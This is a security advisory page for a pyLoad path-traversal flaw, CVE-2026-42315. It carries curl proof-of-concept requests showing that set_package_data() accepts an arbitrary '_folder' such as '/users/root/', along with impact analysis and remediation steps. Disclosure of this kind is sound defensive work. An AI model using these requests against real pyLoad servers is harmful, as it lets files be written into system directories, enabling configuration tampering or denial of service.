pyLoad CVE-2026-42315
HIGH
GHSA-838g-gr43-qqg9
CVSS VectorNVD
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
Lifecycle Timeline
2Blast Radius
ecosystem impact- 1 pypi packages depend on pyload-ng (1 direct, 0 indirect)
Ecosystem-wide dependent count for version 0.5.0b3.dev100.
DescriptionNVD
Summary
No sanitization of package folder name allows writing files anywhere outside the intended download directory. #### Affected Component
src/pyload/core/api/__init__.py- Function:
set_package_data()
Details
When passing a folder name in the set_package_data() API function call inside the data object with key "_folder", there is no sanitization at all, allowing a user with Perms.MODIFY to specify arbitrary directories as download locations for a package.
PoC
- Create a package, note response package ID e.g.
5
curl -X 'POST' \
'http://localhost:8000/api/add_package' \
-H 'accept: application/json' \
-H 'X-API-Key: <valid api key>' \
-H 'Content-Type: application/json' \
-d '{
"name": "set_package_data_exploit_poc",
"links": [
"http://example.com/file.txt"
],
"dest": 1
}'- Call set_package_data for this package ID with an arbitrary directory
curl -X 'POST' \
'http://localhost:8000/api/set_package_data' \
-H 'accept: */*' \
-H 'X-API-Key: <valid api key>' \
-H 'Content-Type: application/json' \
-d '{
"package_id": 5,
"data": {
"_folder": "/users/root/"
}
}'- New download folder will be set without any checks
curl -X 'GET' \
'http://localhost:8000/api/get_queue' \
-H 'accept: application/json' \
-H 'X-API-Key: <valid api key>'Response:
[
{
"pid": 5,
"name": "set_package_data_exploit_poc",
"folder": "/users/root/",
"site": "",
"password": "",
"dest": 1,
"order": 1,
"linksdone": 0,
"sizedone": 0,
"sizetotal": 0,
"linkstotal": 1,
"links": null,
"fids": null
}
]Impact
Allows Absolute Path Traversal to write in an arbitrary directory as long as the pyLoad process has write access.
AnalysisAI
Absolute path traversal in pyLoad download manager allows authenticated users to write files to arbitrary filesystem locations via unsanitized package folder names in the set_package_data() API function. Users with Perms.MODIFY can redirect downloads to sensitive directories (e.g., /etc, /root, system directories) bypassing intended download directory restrictions, enabling configuration overwrite or denial of service through disk exhaustion. …
Sign in for full analysis, threat intelligence, and remediation guidance.
RemediationAI
Within 24 hours: Inventory all systems running pyLoad and document current versions; restrict modification permissions (Perms.MODIFY) to trusted administrators only and audit current permission assignments. Within 7 days: Implement network segmentation to limit pyLoad process privileges and monitor file write operations from pyLoad processes to sensitive directories (/etc, /root, system paths); consider disabling pyLoad if not operationally critical. …
Sign in for detailed remediation steps.
Share
External POC / Exploit Code
Leaving vuln.today